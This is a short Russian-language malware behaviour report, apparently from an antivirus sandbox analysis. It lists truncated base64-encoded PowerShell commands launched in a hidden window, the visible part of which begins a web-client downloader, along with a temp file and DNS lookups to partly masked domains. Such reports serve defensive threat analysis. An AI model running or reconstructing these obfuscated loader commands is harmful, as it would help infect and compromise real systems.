Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEcAYwBfAF8AQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFgAQQAnACwAJwB2AGsAUQBRAEEARAAnACkAOwAkAEIAUQB3AEEAVQBjAEEAbwA9AG4AZQB3AC0AYABvAGIAYABKAGUAQwBUACAAKAAnAE4AZQB0AC4AVwBlAGIAQwAnAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1157433.cvr
- DNS ASK wz##w.com
- DNS ASK al###aemlak.com
- DNS ASK ac###sdig.com
- DNS ASK la####apharma.com
- DNS ASK et#####womenawards.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AEcAYwBfAF8AQQBBAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFgAQQAnACwAJwB2AGsAUQBRAEEARAAnACkAOwAkAEIAUQB3AEEAVQBjAEEAbwA9AG4AZQB3AC0AYABvAGIAYABKAGUAQwBUACAAKAAnAE4AZQB0AC4AVwBlAGIAQwAnAC...' (со скрытым окном)